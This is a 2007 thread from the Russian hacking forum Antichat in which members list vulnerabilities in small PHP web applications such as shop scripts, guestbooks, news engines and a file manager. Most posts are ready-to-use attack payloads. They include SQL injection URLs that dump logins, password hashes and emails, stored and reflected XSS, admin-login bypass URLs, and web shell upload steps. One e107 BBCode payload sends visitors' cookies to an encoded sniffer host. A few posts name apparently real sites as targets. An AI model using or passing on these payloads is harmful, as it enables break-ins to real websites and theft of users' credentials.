Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

26.04.2007, 23:20
|
|
Постоянный
Регистрация: 05.07.2006
Сообщений: 458
Провел на форуме: 2943499
Репутация:
807
|
|
Amiro.CMS
Активная хсс в гостевой, уязвимы поля "Заголовок:" и
"Сообщение:"
Искать "Работает на: система управления сайтом Amiro CMS"
Последний раз редактировалось freddi; 26.04.2007 в 23:39..
|
|
|

27.04.2007, 20:05
|
|
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме: 17668503
Репутация:
5826
|
|
Бесплатные движки инет-магазинов:
1. myInvoice 1
SQL инъекция:
Код:
http://site.ru/invoice.php?id='+union+select+1,2,3,4,5,6/*
Вывод номера, логина, хеша пароля (mysql4) и мыла пользователя:
Код:
http://site.ru/invoice.php?id='+union+select+1,2,3,convert(concat(clientid,char(58),name,char(58),password,char(58),email),char),5,6+from+clients/*
--------------------
2. Shop-Script Free
SQL инъекция:
Код:
http://site.ru/index.php?CID=-1+union+select+1,2/*
http://site.ru/index.php?CID=-1+union+select+1,convert(concat(database(),char(58),user(),char(58),version()),char)/*
--------------------
3. Pricelistme! 1
SQL инъекция:
Код:
http://site.ru/one_index_product.php?loginis=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/*
http://site.ru/one_index_product.php?loginis=-1+union+select+1,convert(concat(database(),char(58),user(),char(58),version()),char),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/*
---------------------------------------------------
---------------------------------------------------
Календари и органайзеры:
1. Geo-Contacts 1.1
SQL инъекция:
Код:
http://site.ru/view.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12/*
http://site.ru/view.php?id=-1+union+select+1,2,3,convert(concat(database(),char(58),user(),char(58),version()),char),5,6,7,8,9,10,11,12/*
2. phpAbook 0.8.5b
Пассивная XSS:
Код:
http://site.ru/include/inc.footer.php?abook_vers=<script>alert();</script>
3. php-addressbook v1.2
SQL инъекция:
Код:
http://site.ru/view.php?id=-1+union+select+1,2,3,convert(concat(database(),char(58),user(),char(58),version()),char),5,6,7,8,9,10,11,12/*
---------------------------------------------------
---------------------------------------------------
Игры:
1. 100 Question Simple Trivia Script 1
SQL инъекция:
Код:
http://site.ru/trivia.php?trivia_id=-1+union+select+1,2,3,4,5/*
http://site.ru/trivia.php?trivia_id=-1+union+select+1,convert(concat(database(),char(58),user(),char(58),version()),char),3,4,5/*
Последний раз редактировалось Grey; 28.04.2007 в 18:31..
|
|
|

30.04.2007, 21:18
|
|
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме: 17668503
Репутация:
5826
|
|
Гостевые книги:
1. EzGuestBook 1.1
1) Активные XSS:
При создание сообщения в поля Name, E-Mail, Message вписываем скрипт, скрипт будет выполняться при просмотре сообщений, в том чиле и в админке.
2) SQL инъекция:
Код:
http://site.ru/guestbook.php?action=sort&by=name&from='+union+select+1,2,3,4,5/*
Вывод логина и пароля пользователя:
Код:
http://site.ru/guestbook.php?action=sort&by=name&from='+union+select+concat(login,char(58),password),2,3,4,5+from+ez_guestbook_auth/*
2. ChitChat 2.0
Активная XSS:
При создание сообщения в поле Website вписываем скрипт, скрипт будет выполняться при просмотре сообщений.
3. ParkerGuestbook v4.00 Add moderators
Из-за не корректного условия проверки логина и пароля, можно попасть в админку зная только логин или только пароль.
Угадать логин проще - к примеру стандартный логин admin, его могут не поменять.
Доступ к админке, имя только логин:
http://site.ru/admin.php? adminlogin=grey&logged=1
Доступ к админке, имя только пароль:
http://site.ru/admin.php? adminpass=123&logged=1
4. ParkerGuestbook v2.00
Активные XSS:
При создание сообщения в поля Имя, Сайт, ICQ, Город вписываем скрипт, скрипт будет выполняться при просмотре сообщений.
|
|
|

01.05.2007, 17:11
|
|
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме: 17668503
Репутация:
5826
|
|
Гостевые книги:
1. NEOgeN GuestBook 1.2
1) Активная XSS:
При добавление сообщения в поле Ваше Имя вписываем скрипт, скрипт будет выполняться при просмотре сообщений.
2) Пасивная XSS:
Код:
http://site.ru/footer.php?GBookTitle=<script>alert();</script>
2. Php Trofimov guestbook v1.0
Активная XSS:
При добавление сообщения в поле Имя вписываем скрипт, скрипт будет выполняться при просмотре сообщений.
3. Trofimov book v1.0
Из-за отсутствия условия входа в админку, можно получить достп в админку:
http://site.ru/gb.php? action=admin
4. Rzhavin FAQ 1.0
1) Из-за не коректного условия входа в админку, можно получить частичный достп в админку:
http://site.ru/admin.php? showform=1
2) Активная XSS:
При добавление сообщения в поле Имя вписываем скрипт, скрипт будет выполняться при просмотре сообщений.
5. spiderLog 1.0
Активные XSS:
При добавление сообщения в поля Name, E-mail Address, City, State / Province, Country вписываем скрипт, скрипт будет выполняться при просмотре сообщений.
6. Filebased Guestbook 1.0.1
Активные XSS:
При добавление сообщения в поля Name, Comment вписываем скрипт, скрипт будет выполняться при просмотре сообщений.
|
|
|

04.05.2007, 18:40
|
|
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме: 17668503
Репутация:
5826
|
|
Новостные двиги:
1. CuteNews rus v025
Пасивная XSS:
Код:
http://site.ru/example2.php?dosearch=yes&story="><script>alert();</script>
2. CuteNews.RU v.026
Активные XSS:
При добавление комментария в сообщение в поля Имя и Сообщение вписываем скрипт, скрипт будет выполняться при просмотре коментариев.
3. pagenews 1.0
1) SQL инъекция:
Код:
http://site.ru/insert.php?id='+union+select+1/*
http://site.ru/insert.php?id='+union+select+convert(database(),char)/*
2) Заливка шелла:
При загрузке файлов на сайт, расширение файла не проверяется.
Загружаются файлы в директрию uploads:
http://site.ru/uploads/shell.php
4. Sunny's Simple Diary
SQL инъекция:
Код:
http://site.ru/index.php?month='+union+select+1,2,3/*
http://localhost/1/index.php?month='+union+select+1,convert(version(),char),3/*
5. vNews v1.2
1) Свободный доступ в админку:
http://site.ru/newsadmin.php
2) Активная XSS:
При добавление новости в поле News вписываем скрипт.
3) SQL инъекция:
Код:
http://site.ru/newscontent.php?action=edit&id='+union+select+1,2,3/*
http://site.ru/newscontent.php?action=edit&id='+union+select+1,convert(version(),char),3/*
Последний раз редактировалось Grey; 05.05.2007 в 12:16..
|
|
|

04.05.2007, 23:06
|
|
Постоянный
Регистрация: 05.07.2006
Сообщений: 458
Провел на форуме: 2943499
Репутация:
807
|
|
Сообщение от Grey
5. Sad Raven's Guestbook v1.1
Можно попасть в админку минуя ввод логина и пароля:
http://site.ru/gb/admin.php?logined=1
А можно перейти по ссылке
www.сайт.ru/gb/passwd.dat
и перед нами будет:
<?php
$Password['логин'] = "хеш пароля";
?>
пример
http://www.ivanovo.ac.ru/win1251/fac_phys/admin.php
еще прикольная фишка там со знаком "|" попробуйте вставлять его в поля разные.
Последний раз редактировалось freddi; 04.05.2007 в 23:23..
|
|
|

05.05.2007, 13:12
|
|
Новичок
Регистрация: 03.12.2006
Сообщений: 16
Провел на форуме: 92377
Репутация:
2
|
|
e107 (какая версия не знаю, но не 7.8)
Этот текст можно вставлять в сообщение на форуме, в комментарий к новости, в личное сообщение.
[img]http://<путь к картинке>'onload=i=new/**/Image();i.src=unescape('%68%74%74...')+document.co okie;'[/img]
где %68%74%74... - закодированный путь к снифферу со знаком вопроса в конце.
Последний раз редактировалось SkyMan; 28.05.2007 в 02:53..
|
|
|

09.05.2007, 04:37
|
|
Познающий
Регистрация: 10.02.2007
Сообщений: 38
Провел на форуме: 1223241
Репутация:
183
|
|
На днях нашел.
BlaB! Lite 2.2
Скрипт для полноценного чата на PHP
Активная XSS:
.................................................. .......................
Уязвимость существует из-за недостаточной
обработки входных данных в поле " Nickname:"
в сценарии login.php:
В поле " Nickname:" пишем:
Код:
<SCRIPT>alert(document.cookie)</SCRIPT>
Входим,отправляем сообщение,видим знакомый алерт();!
____________________________________
Подмена IP-адреса:
.................................................. .......................
В поле " Nickname:" пишем:
Код:
Желаемое имя:|:Ваше сообщение:|:Любой IP-адрес
Входим,отправляем сообщение
( содержание не важно!).
Таким образом в базу заносится не ваш IP-адрес,
а тот который вы указали!
Пример:
http://zeus.aegee.org/cdstuff/chat
_____________________________________
*********************************
|
|
|

13.05.2007, 18:48
|
|
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме: 17668503
Репутация:
5826
|
|
Скрипт знакомств:
Интим-услуги Nevius
1) Пасивная XSS:
Код:
http://site.ru/list.php?g=<script>alert();</script>
2) SQL инъекция:
Код:
http://site.ru/list.php?g=&link=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,23,24,25,26,27,28,29,30,31,32,33,34,35,36/*
Вывод логина и пароля пользователя:
Код:
http://site.ru/list.php?g=&link=-1+union+select+1,concat(login,char(58),pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,23,24,25,26,27,28,29,30,31,32,33,34,35,36+from+users/*
|
|
|

29.05.2007, 18:53
|
|
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме: 17668503
Репутация:
5826
|
|
PHP Advanced Transfer Manager Full version: 1.30
Скрипт очень дырявый, в нём еще локальный инклуд файлов находили:
http://forum.antichat.ru/showpost.ph...62&postcount=8
а вот про xss вроде не было:
Пасивные XSS:
viewers/txt.php
Код:
http://site.ru/viewers/txt.php?filename=<script>alert();</script>
http://site.ru/viewers/txt.php?current_dir=<script>alert();</script>
viewers/jpg.php
Код:
http://site.ru/viewers/jpg.php?filename="><script>alert();</script>
http://site.ru/viewers/jpg.php?directory="><script>alert();</script>
viewers/jpeg.php
Код:
http://site.ru/viewers/jpeg.php?filename="><script>alert();</script>
http://site.ru/viewers/jpeg.php?directory="><script>alert();</script>
viewers/gif.php
Код:
http://site.ru/viewers/gif.php?filename="><script>alert();</script>
http://site.ru/viewers/gif.php?directory="><script>alert();</script>
viewers/bmp.php
Код:
http://site.ru/viewers/bmp.php?filename="><script>alert();</script>
http://site.ru/viewers/bmp.php?directory="><script>alert();</script>
viewers/png.php
Код:
http://site.ru/viewers/png.php?filename="><script>alert();</script>
http://site.ru/viewers/png.php?directory="><script>alert();</script>
viewers/swf.php
Код:
http://site.ru/viewers/swf.php?filename="><script>alert();</script>
http://site.ru/viewers/swf.php?directory="><script>alert();</script>
viewers/mov.php
Код:
http://site.ru/viewers/mov.php?filename="><script>alert();</script>
http://site.ru/viewers/mov.php?current_dir="><script>alert();</script>
viewers/tif.php
Код:
http://site.ru/viewers/tif.php?filename="><script>alert();</script>
http://site.ru/viewers/tif.php?directory="><script>alert();</script>
Заливка шелла:
------------------
В админке заходим в конфигурацию (Admin: Configure Upload Center)
Там можно редактивровать файлы:
footer.htm
header.htm
info.htm
mailinfo.htm
В любой из них вписываем шелл.
Главное что бы файлы с расширением .htm выполнялись как php.
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|